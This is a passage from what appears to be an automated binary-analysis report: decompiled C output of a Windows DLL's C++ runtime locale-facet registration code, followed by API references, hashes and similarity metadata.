																E6E1E3D74(_t902 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t637, _t843, _t864, 0x14);
																E6E1C6653(_t902 - 0x14, 0);
																_t865 =  *0x6e286dec;
																 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																 *(_t902 - 0x10) = _t865;
																_t345 = E6E1A161C(0x6e286d98);
																_t668 =  *((intOrPtr*)(_t902 + 8));
																_t844 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t345);
																__eflags = _t844;
																if(_t844 != 0) {
																	L33:
																	E6E1C66BA(_t902 - 0x14);
																	return E6E1E0075(_t844);
																} else {
																	__eflags = _t865;
																	if(_t865 == 0) {
																		_push( *((intOrPtr*)(_t902 + 8)));
																		_push(_t902 - 0x10);
																		__eflags = E6E1D0F87(_t637, _t668, _t838, _t844, _t865) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t902 - 0x20);
																			E6E1E3D74(_t902 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t637, _t844, _t865, 0x14);
																			E6E1C6653(_t902 - 0x14, 0);
																			_t866 =  *0x6e286dbc;
																			 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																			 *(_t902 - 0x10) = _t866;
																			_t358 = E6E1A161C(0x6e286d70);
																			_t675 =  *((intOrPtr*)(_t902 + 8));
																			_t845 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t358);
																			__eflags = _t845;
																			if(_t845 != 0) {
																				L40:
																				E6E1C66BA(_t902 - 0x14);
																				return E6E1E0075(_t845);
																			} else {
																				__eflags = _t866;
																				if(_t866 == 0) {
																					_push( *((intOrPtr*)(_t902 + 8)));
																					_push(_t902 - 0x10);
																					__eflags = E6E1D0FEF(_t637, _t675, _t838, _t845, _t866) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t902 - 0x20);
																						E6E1E3D74(_t902 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t637, _t845, _t866, 0x14);
																						E6E1C6653(_t902 - 0x14, 0);
																						_t867 =  *0x6e286df0;
																						 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																						 *(_t902 - 0x10) = _t867;
																						_t371 = E6E1A161C(0x6e286d9c);
																						_t682 =  *((intOrPtr*)(_t902 + 8));
																						_t846 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t371);
																						__eflags = _t846;
																						if(_t846 != 0) {
																							L47:
																							E6E1C66BA(_t902 - 0x14);
																							return E6E1E0075(_t846);
																						} else {
																							__eflags = _t867;
																							if(_t867 == 0) {
																								_push( *((intOrPtr*)(_t902 + 8)));
																								_push(_t902 - 0x10);
																								__eflags = E6E1D1057(_t637, _t682, _t838, _t846, _t867) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t902 - 0x20);
																									E6E1E3D74(_t902 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t637, _t846, _t867, 0x14);
																									E6E1C6653(_t902 - 0x14, 0);
																									_t868 =  *0x6e286dc0;
																									 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																									 *(_t902 - 0x10) = _t868;
																									_t384 = E6E1A161C(0x6e286d74);
																									_t689 =  *((intOrPtr*)(_t902 + 8));
																									_t847 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t384);
																									__eflags = _t847;
																									if(_t847 != 0) {
																										L54:
																										E6E1C66BA(_t902 - 0x14);
																										return E6E1E0075(_t847);
																									} else {
																										__eflags = _t868;
																										if(_t868 == 0) {
																											_push( *((intOrPtr*)(_t902 + 8)));
																											_push(_t902 - 0x10);
																											__eflags = E6E1D10BF(_t637, _t689, _t838, _t847, _t868) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t902 - 0x20);
																												E6E1E3D74(_t902 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t637, _t847, _t868, 0x14);
																												E6E1C6653(_t902 - 0x14, 0);
																												_t869 =  *0x6e286df8;
																												 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																												 *(_t902 - 0x10) = _t869;
																												_t397 = E6E1A161C(0x6e286da4);
																												_t696 =  *((intOrPtr*)(_t902 + 8));
																												_t848 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t397);
																												__eflags = _t848;
																												if(_t848 != 0) {
																													L61:
																													E6E1C66BA(_t902 - 0x14);
																													return E6E1E0075(_t848);
																												} else {
																													__eflags = _t869;
																													if(_t869 == 0) {
																														_push( *((intOrPtr*)(_t902 + 8)));
																														_push(_t902 - 0x10);
																														__eflags = E6E1D1127(_t637, _t696, _t838, _t848, _t869) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t902 - 0x20);
																															E6E1E3D74(_t902 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t637, _t848, _t869, 0x14);
																															E6E1C6653(_t902 - 0x14, 0);
																															_t870 =  *0x6e286df4;
																															 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																															 *(_t902 - 0x10) = _t870;
																															_t410 = E6E1A161C(0x6e286da0);
																															_t703 =  *((intOrPtr*)(_t902 + 8));
																															_t849 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t410);
																															__eflags = _t849;
																															if(_t849 != 0) {
																																L68:
																																E6E1C66BA(_t902 - 0x14);
																																return E6E1E0075(_t849);
																															} else {
																																__eflags = _t870;
																																if(_t870 == 0) {
																																	_push( *((intOrPtr*)(_t902 + 8)));
																																	_push(_t902 - 0x10);
																																	__eflags = E6E1D11AB(_t637, _t703, _t838, _t849, _t870) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t902 - 0x20);
																																		E6E1E3D74(_t902 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t637, _t849, _t870, 0x14);
																																		E6E1C6653(_t902 - 0x14, 0);
																																		_t871 =  *0x6e286dc8;
																																		 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																		 *(_t902 - 0x10) = _t871;
																																		_t423 = E6E1A161C(0x6e286d7c);
																																		_t710 =  *((intOrPtr*)(_t902 + 8));
																																		_t850 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t423);
																																		__eflags = _t850;
																																		if(_t850 != 0) {
																																			L75:
																																			E6E1C66BA(_t902 - 0x14);
																																			return E6E1E0075(_t850);
																																		} else {
																																			__eflags = _t871;
																																			if(_t871 == 0) {
																																				_push( *((intOrPtr*)(_t902 + 8)));
																																				_push(_t902 - 0x10);
																																				__eflags = E6E1D1230(_t637, _t710, _t838, _t850, _t871) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1A1438(_t902 - 0x20);
																																					E6E1E3D74(_t902 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e2283cf, _t637, _t850, _t871, 0x14);
																																					E6E1C6653(_t902 - 0x14, 0);
																																					_t872 =  *0x6e286dc4;
																																					 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																					 *(_t902 - 0x10) = _t872;
																																					_t436 = E6E1A161C(0x6e286d78);
																																					_t717 =  *((intOrPtr*)(_t902 + 8));
																																					_t851 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t436);
																																					__eflags = _t851;
																																					if(_t851 != 0) {
																																						L82:
																																						E6E1C66BA(_t902 - 0x14);
																																						return E6E1E0075(_t851);
																																					} else {
																																						__eflags = _t872;
																																						if(_t872 == 0) {
																																							_push( *((intOrPtr*)(_t902 + 8)));
																																							_push(_t902 - 0x10);
																																							__eflags = E6E1D12B4(_t637, _t717, _t838, _t851, _t872) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1A1438(_t902 - 0x20);
																																								E6E1E3D74(_t902 - 0x20, 0x6e283504);
																																								asm("int3");
																																								E6E1E00AC(0x6e2283cf, _t637, _t851, _t872, 0x14);
																																								E6E1C6653(_t902 - 0x14, 0);
																																								_t873 =  *0x6e286dd8;
																																								 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																								 *(_t902 - 0x10) = _t873;
																																								_t449 = E6E1A161C(0x6e286d84);
																																								_t724 =  *((intOrPtr*)(_t902 + 8));
																																								_t852 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t449);
																																								__eflags = _t852;
																																								if(_t852 != 0) {
																																									L89:
																																									E6E1C66BA(_t902 - 0x14);
																																									return E6E1E0075(_t852);
																																								} else {
																																									__eflags = _t873;
																																									if(_t873 == 0) {
																																										_push( *((intOrPtr*)(_t902 + 8)));
																																										_push(_t902 - 0x10);
																																										__eflags = E6E1D1339(_t637, _t724, _t838, _t852, _t873) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1A1438(_t902 - 0x20);
																																											E6E1E3D74(_t902 - 0x20, 0x6e283504);
																																											asm("int3");
																																											E6E1E00AC(0x6e2283cf, _t637, _t852, _t873, 0x14);
																																											E6E1C6653(_t902 - 0x14, 0);
																																											_t874 =  *0x6e286db0;
																																											 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																											 *(_t902 - 0x10) = _t874;
																																											_t462 = E6E1A161C(0x6e286d64);
																																											_t731 =  *((intOrPtr*)(_t902 + 8));
																																											_t853 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t462);
																																											__eflags = _t853;
																																											if(_t853 != 0) {
																																												L96:
																																												E6E1C66BA(_t902 - 0x14);
																																												return E6E1E0075(_t853);
																																											} else {
																																												__eflags = _t874;
																																												if(_t874 == 0) {
																																													_push( *((intOrPtr*)(_t902 + 8)));
																																													_push(_t902 - 0x10);
																																													__eflags = E6E1D13A1(_t637, _t731, _t838, _t853, _t874) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1A1438(_t902 - 0x20);
																																														E6E1E3D74(_t902 - 0x20, 0x6e283504);
																																														asm("int3");
																																														E6E1E00AC(0x6e2283cf, _t637, _t853, _t874, 0x14);
																																														E6E1C6653(_t902 - 0x14, 0);
																																														_t875 =  *0x6e286ddc;
																																														 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																														 *(_t902 - 0x10) = _t875;
																																														_t475 = E6E1A161C(0x6e286d88);
																																														_t738 =  *((intOrPtr*)(_t902 + 8));
																																														_t854 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t475);
																																														__eflags = _t854;
																																														if(_t854 != 0) {
																																															L103:
																																															E6E1C66BA(_t902 - 0x14);
																																															return E6E1E0075(_t854);
																																														} else {
																																															__eflags = _t875;
																																															if(_t875 == 0) {
																																																_push( *((intOrPtr*)(_t902 + 8)));
																																																_push(_t902 - 0x10);
																																																__eflags = E6E1D1409(_t637, _t738, _t838, _t854, _t875) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1A1438(_t902 - 0x20);
																																																	E6E1E3D74(_t902 - 0x20, 0x6e283504);
																																																	asm("int3");
																																																	E6E1E00AC(0x6e2283cf, _t637, _t854, _t875, 0x14);
																																																	E6E1C6653(_t902 - 0x14, 0);
																																																	_t876 =  *0x6e286de0;
																																																	 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																	 *(_t902 - 0x10) = _t876;
																																																	_t488 = E6E1A161C(0x6e286d8c);
																																																	_t745 =  *((intOrPtr*)(_t902 + 8));
																																																	_t855 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t488);
																																																	__eflags = _t855;
																																																	if(_t855 != 0) {
																																																		L110:
																																																		E6E1C66BA(_t902 - 0x14);
																																																		return E6E1E0075(_t855);
																																																	} else {
																																																		__eflags = _t876;
																																																		if(_t876 == 0) {
																																																			_push( *((intOrPtr*)(_t902 + 8)));
																																																			_push(_t902 - 0x10);
																																																			__eflags = E6E1D1471(_t637, _t745, _t838, _t855, _t876) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1A1438(_t902 - 0x20);
																																																				E6E1E3D74(_t902 - 0x20, 0x6e283504);
																																																				asm("int3");
																																																				E6E1E00AC(0x6e2283cf, _t637, _t855, _t876, 0x14);
																																																				E6E1C6653(_t902 - 0x14, 0);
																																																				_t877 =  *0x6e286dfc;
																																																				 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																				 *(_t902 - 0x10) = _t877;
																																																				_t501 = E6E1A161C(0x6e286da8);
																																																				_t752 =  *((intOrPtr*)(_t902 + 8));
																																																				_t856 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t501);
																																																				__eflags = _t856;
																																																				if(_t856 != 0) {
																																																					L117:
																																																					E6E1C66BA(_t902 - 0x14);
																																																					return E6E1E0075(_t856);
																																																				} else {
																																																					__eflags = _t877;
																																																					if(_t877 == 0) {
																																																						_push( *((intOrPtr*)(_t902 + 8)));
																																																						_push(_t902 - 0x10);
																																																						__eflags = E6E1D14EC(_t637, _t752, _t838, _t856, _t877) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6E1A1438(_t902 - 0x20);
																																																							E6E1E3D74(_t902 - 0x20, 0x6e283504);
																																																							asm("int3");
																																																							E6E1E00AC(0x6e2283cf, _t637, _t856, _t877, 0x14);
																																																							E6E1C6653(_t902 - 0x14, 0);
																																																							_t878 =  *0x6e286dcc;
																																																							 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																							 *(_t902 - 0x10) = _t878;
																																																							_t514 = E6E1A161C(0x6e286d80);
																																																							_t759 =  *((intOrPtr*)(_t902 + 8));
																																																							_t857 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t514);
																																																							__eflags = _t857;
																																																							if(_t857 != 0) {
																																																								L124:
																																																								E6E1C66BA(_t902 - 0x14);
																																																								return E6E1E0075(_t857);
																																																							} else {
																																																								__eflags = _t878;
																																																								if(_t878 == 0) {
																																																									_push( *((intOrPtr*)(_t902 + 8)));
																																																									_push(_t902 - 0x10);
																																																									__eflags = E6E1D1558(_t637, _t759, _t838, _t857, _t878) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6E1A1438(_t902 - 0x20);
																																																										E6E1E3D74(_t902 - 0x20, 0x6e283504);
																																																										asm("int3");
																																																										E6E1E00AC(0x6e2283cf, _t637, _t857, _t878, 0x14);
																																																										E6E1C6653(_t902 - 0x14, 0);
																																																										_t879 =  *0x6e286e00;
																																																										 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																										 *(_t902 - 0x10) = _t879;
																																																										_t527 = E6E1A161C(0x6e286dac);
																																																										_t766 =  *((intOrPtr*)(_t902 + 8));
																																																										_t858 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t527);
																																																										__eflags = _t858;
																																																										if(_t858 != 0) {
																																																											L131:
																																																											E6E1C66BA(_t902 - 0x14);
																																																											return E6E1E0075(_t858);
																																																										} else {
																																																											__eflags = _t879;
																																																											if(_t879 == 0) {
																																																												_push( *((intOrPtr*)(_t902 + 8)));
																																																												_push(_t902 - 0x10);
																																																												__eflags = E6E1D15C4(_t637, _t766, _t838, _t858, _t879) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													E6E1A1438(_t902 - 0x20);
																																																													E6E1E3D74(_t902 - 0x20, 0x6e283504);
																																																													asm("int3");
																																																													E6E1E00AC(0x6e2283cf, _t637, _t858, _t879, 0x14);
																																																													E6E1C6653(_t902 - 0x14, 0);
																																																													_t880 =  *0x6e286dd0;
																																																													 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																													 *(_t902 - 0x10) = _t880;
																																																													_t540 = E6E1A161C(0x6e286d60);
																																																													_t773 =  *((intOrPtr*)(_t902 + 8));
																																																													_t859 = E6E1A171B( *((intOrPtr*)(_t902 + 8)), _t540);
																																																													__eflags = _t859;
																																																													if(_t859 != 0) {
																																																														L138:
																																																														E6E1C66BA(_t902 - 0x14);
																																																														return E6E1E0075(_t859);
																																																													} else {
																																																														__eflags = _t880;
																																																														if(_t880 == 0) {
																																																															_push( *((intOrPtr*)(_t902 + 8)));
																																																															_push(_t902 - 0x10);
																																																															__eflags = E6E1D162A(_t637, _t773, _t838, _t859, _t880) - 0xffffffff;
																																																															if(__eflags == 0) {
																																																																_t777 = _t902 - 0x20;
																																																																E6E1A1438(_t777);
																																																																E6E1E3D74(_t902 - 0x20, 0x6e283504);
																																																																asm("int3");
																																																																E6E1E00AC(0x6e22851f, _t637, _t859, _t880, 4);
																																																																_t881 = _t777;
																																																																 *(_t902 - 0x10) = _t881;
																																																																 *((intOrPtr*)(_t881 + 4)) =  *((intOrPtr*)(_t902 + 0xc));
																																																																_push( *((intOrPtr*)(_t902 + 0x14)));
																																																																_t287 = _t902 - 4;
																																																																 *_t287 =  *(_t902 - 4) & 0x00000000;
																																																																__eflags =  *_t287;
																																																																 *_t881 = 0x6e22c0c4;
																																																																 *((char*)(_t881 + 0x28)) =  *((intOrPtr*)(_t902 + 0x10));
																																																																E6E1D542F(_t637, _t777, _t838, _t859, _t881,  *_t287);
																																																																return E6E1E0075(_t881,  *((intOrPtr*)(_t902 + 8)));
																																																															} else {
																																																																_t859 =  *(_t902 - 0x10);
																																																																 *(_t902 - 0x10) = _t859;
																																																																 *(_t902 - 4) = 1;
																																																																E6E1C6FD3(__eflags, _t859);
																																																																 *0x6e22a26c();
																																																																 *((intOrPtr*)( *((intOrPtr*)( *_t859 + 4))))();
																																																																 *0x6e286dd0 = _t859;
																																																																goto L138;
																																																															}
																																																														} else {
																																																															_t859 = _t880;
																																																															goto L138;
																																																														}
																																																													}
																																																												} else {
																																																													_t858 =  *(_t902 - 0x10);
																																																													 *(_t902 - 0x10) = _t858;
																																																													 *(_t902 - 4) = 1;
																																																													E6E1C6FD3(__eflags, _t858);
																																																													 *0x6e22a26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t858 + 4))))();
																																																													 *0x6e286e00 = _t858;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t858 = _t879;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t857 =  *(_t902 - 0x10);
																																																										 *(_t902 - 0x10) = _t857;
																																																										 *(_t902 - 4) = 1;
																																																										E6E1C6FD3(__eflags, _t857);
																																																										 *0x6e22a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t857 + 4))))();
																																																										 *0x6e286dcc = _t857;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t857 = _t878;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t856 =  *(_t902 - 0x10);
																																																							 *(_t902 - 0x10) = _t856;
																																																							 *(_t902 - 4) = 1;
																																																							E6E1C6FD3(__eflags, _t856);
																																																							 *0x6e22a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t856 + 4))))();
																																																							 *0x6e286dfc = _t856;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t856 = _t877;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t855 =  *(_t902 - 0x10);
																																																				 *(_t902 - 0x10) = _t855;
																																																				 *(_t902 - 4) = 1;
																																																				E6E1C6FD3(__eflags, _t855);
																																																				 *0x6e22a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t855 + 4))))();
																																																				 *0x6e286de0 = _t855;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t855 = _t876;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t854 =  *(_t902 - 0x10);
																																																	 *(_t902 - 0x10) = _t854;
																																																	 *(_t902 - 4) = 1;
																																																	E6E1C6FD3(__eflags, _t854);
																																																	 *0x6e22a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t854 + 4))))();
																																																	 *0x6e286ddc = _t854;
																																																	goto L103;
																																																}
																																															} else {
																																																_t854 = _t875;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t853 =  *(_t902 - 0x10);
																																														 *(_t902 - 0x10) = _t853;
																																														 *(_t902 - 4) = 1;
																																														E6E1C6FD3(__eflags, _t853);
																																														 *0x6e22a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t853 + 4))))();
																																														 *0x6e286db0 = _t853;
																																														goto L96;
																																													}
																																												} else {
																																													_t853 = _t874;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t852 =  *(_t902 - 0x10);
																																											 *(_t902 - 0x10) = _t852;
																																											 *(_t902 - 4) = 1;
																																											E6E1C6FD3(__eflags, _t852);
																																											 *0x6e22a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t852 + 4))))();
																																											 *0x6e286dd8 = _t852;
																																											goto L89;
																																										}
																																									} else {
																																										_t852 = _t873;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t851 =  *(_t902 - 0x10);
																																								 *(_t902 - 0x10) = _t851;
																																								 *(_t902 - 4) = 1;
																																								E6E1C6FD3(__eflags, _t851);
																																								 *0x6e22a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t851 + 4))))();
																																								 *0x6e286dc4 = _t851;
																																								goto L82;
																																							}
																																						} else {
																																							_t851 = _t872;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t850 =  *(_t902 - 0x10);
																																					 *(_t902 - 0x10) = _t850;
																																					 *(_t902 - 4) = 1;
																																					E6E1C6FD3(__eflags, _t850);
																																					 *0x6e22a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t850 + 4))))();
																																					 *0x6e286dc8 = _t850;
																																					goto L75;
																																				}
																																			} else {
																																				_t850 = _t871;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t849 =  *(_t902 - 0x10);
																																		 *(_t902 - 0x10) = _t849;
																																		 *(_t902 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t849);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t849 + 4))))();
																																		 *0x6e286df4 = _t849;
																																		goto L68;
																																	}
																																} else {
																																	_t849 = _t870;
																																	goto L68;
																																}
																															}
																														} else {
																															_t848 =  *(_t902 - 0x10);
																															 *(_t902 - 0x10) = _t848;
																															 *(_t902 - 4) = 1;
																															E6E1C6FD3(__eflags, _t848);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t848 + 4))))();
																															 *0x6e286df8 = _t848;
																															goto L61;
																														}
																													} else {
																														_t848 = _t869;
																														goto L61;
																													}
																												}
																											} else {
																												_t847 =  *(_t902 - 0x10);
																												 *(_t902 - 0x10) = _t847;
																												 *(_t902 - 4) = 1;
																												E6E1C6FD3(__eflags, _t847);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t847 + 4))))();
																												 *0x6e286dc0 = _t847;
																												goto L54;
																											}
																										} else {
																											_t847 = _t868;
																											goto L54;
																										}
																									}
																								} else {
																									_t846 =  *(_t902 - 0x10);
																									 *(_t902 - 0x10) = _t846;
																									 *(_t902 - 4) = 1;
																									E6E1C6FD3(__eflags, _t846);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t846 + 4))))();
																									 *0x6e286df0 = _t846;
																									goto L47;
																								}
																							} else {
																								_t846 = _t867;
																								goto L47;
																							}
																						}
																					} else {
																						_t845 =  *(_t902 - 0x10);
																						 *(_t902 - 0x10) = _t845;
																						 *(_t902 - 4) = 1;
																						E6E1C6FD3(__eflags, _t845);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t845 + 4))))();
																						 *0x6e286dbc = _t845;
																						goto L40;
																					}
																				} else {
																					_t845 = _t866;
																					goto L40;
																				}
																			}
																		} else {
																			_t844 =  *(_t902 - 0x10);
																			 *(_t902 - 0x10) = _t844;
																			 *(_t902 - 4) = 1;
																			E6E1C6FD3(__eflags, _t844);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t844 + 4))))();
																			 *0x6e286dec = _t844;
																			goto L33;
																		}
																	} else {
																		_t844 = _t865;
																		goto L33;
																	}
																}
															} else {
																_t843 =  *(_t902 - 0x10);
																 *(_t902 - 0x10) = _t843;
																 *(_t902 - 4) = 1;
																E6E1C6FD3(__eflags, _t843);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t843 + 4))))();
																 *0x6e286db8 = _t843;
																goto L26;
															}
														} else {
															_t843 = _t864;
															goto L26;
														}
													}
												} else {
													_t842 =  *(_t902 - 0x10);
													 *(_t902 - 0x10) = _t842;
													 *(_t902 - 4) = 1;
													E6E1C6FD3(__eflags, _t842);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t842 + 4))))();
													 *0x6e286de8 = _t842;
													goto L19;
												}
											} else {
												_t842 = _t863;
												goto L19;
											}
										}
									} else {
										_t841 =  *(_t902 - 0x10);
										 *(_t902 - 0x10) = _t841;
										 *(_t902 - 4) = 1;
										E6E1C6FD3(__eflags, _t841);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t841 + 4))))();
										 *0x6e286dd4 = _t841;
										goto L12;
									}
								} else {
									_t841 = _t862;
									goto L12;
								}
							}
						} else {
							_t840 =  *(_t902 - 0x10);
							 *(_t902 - 0x10) = _t840;
							 *(_t902 - 4) = 1;
							E6E1C6FD3(__eflags, _t840);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t840 + 4))))();
							 *0x6e286db4 = _t840;
							goto L5;
						}
					} else {
						_t840 = _t861;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CF03E
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF048
int.LIBCPMT ref: 6E1CF05F

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

collate.LIBCPMT ref: 6E1CF082
std::_Facet_Register.LIBCPMT ref: 6E1CF099
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF0B9
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF0D7

Strings

hm(n, xrefs: 6E1CF053

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID: hm(n
API String ID: 2363045490-1754184310
Opcode ID: 64221c1b6cd84177b3e1dccd124c3592abef3dd405e571110b42a53e99eaba83
Instruction ID: 66446ad53122b2cb91d9852ce40494e5717c218be43e345ec4f3715e5486a554
Opcode Fuzzy Hash: 64221c1b6cd84177b3e1dccd124c3592abef3dd405e571110b42a53e99eaba83
Instruction Fuzzy Hash: 81112C7591051D8BCF01DFD4C854AFEB7BBAF64B14F240809D520E7290DF789985E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF0DD, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CF0DD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t279;
				signed int _t280;
				void* _t292;
				void* _t305;
				void* _t318;
				void* _t331;
				void* _t344;
				void* _t357;
				void* _t370;
				void* _t383;
				void* _t396;
				void* _t409;
				void* _t422;
				void* _t435;
				void* _t448;
				void* _t461;
				void* _t474;
				void* _t487;
				void* _t500;
				void* _t513;
				signed int _t739;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				signed int _t805;
				signed int _t806;
				signed int _t807;
				signed int _t808;
				signed int _t809;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t813;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t819;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				signed int _t829;
				signed int _t830;
				signed int _t831;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				void* _t858;

				_t797 = __edx;
				_t606 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t858 - 0x14, 0);
				_t819 =  *0x6e286dd4;
				 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
				 *(_t858 - 0x10) = _t819;
				_t279 = E6E1A161C(0x6e286b28);
				_t609 =  *((intOrPtr*)(_t858 + 8));
				_t280 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t279);
				_t799 = _t280;
				if(_t280 != 0) {
					L5:
					E6E1C66BA(_t858 - 0x14);
					return E6E1E0075(_t799);
				} else {
					if(_t819 == 0) {
						_push( *((intOrPtr*)(_t858 + 8)));
						_push(_t858 - 0x10);
						__eflags = E6E1D0E47(__ebx, _t609, __edx, _t799, _t819) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t858 - 0x20);
							E6E1E3D74(_t858 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t799, _t819, 0x14);
							E6E1C6653(_t858 - 0x14, 0);
							_t820 =  *0x6e286de8;
							 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
							 *(_t858 - 0x10) = _t820;
							_t292 = E6E1A161C(0x6e286d94);
							_t616 =  *((intOrPtr*)(_t858 + 8));
